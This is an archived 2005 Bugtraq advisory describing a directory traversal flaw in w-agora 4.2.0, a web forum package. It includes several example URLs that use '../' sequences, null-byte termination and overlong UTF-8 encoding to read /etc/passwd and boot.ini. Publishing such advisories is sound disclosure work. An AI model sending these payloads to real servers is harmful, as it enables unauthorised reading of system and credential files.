| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 18 Aug 2005 21:27:40 -0000 From: h4cky0u@...il.com To: bugtraq@...urityfocus.com Subject: w-agora 4.2.0 and prior Remote Directory Travel Vulnerability w-agora 4.2.0 and prior Remote Directory Travel Vulnerability SEVERITY: ========= High SOFTWARE: ========= w-agora 4.2.0 http://w-agora.net INFO: ===== w-agora is a web publishing and forum software. It allows you and your visitors to store and display messages, files, share discussions and other information on your web site. DESCRIPTION: ============ W-agora 4.2.0 and earlier are vulnerable to a remote directory travel bug. Here are some examples: http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini%00 http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd%00 http://localhost/w-agora/index.php?site=../../../../../../../../etc/passwd http://localhost/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae% c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini http://localhost/w-agora/index.php?site=../../../../../../../../boot.ini A proof of concept video supporting this issue can be downloaded from here - http://rapidshare.de/files/4106113/probe.rar.html VENDOR STATUS ============= Vendor was contacted but no response received till date. CREDITS: ======== This vulnerability was discovered and researched by - matrix_killer of h4cky0u Security Forums. mail : matrix_k at abv.bg web : http://www.h4cky0u.org Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!! ORIGINAL: ========= http://h4cky0u.org/viewtopic.php?t=2097
Powered by blists - more mailing lists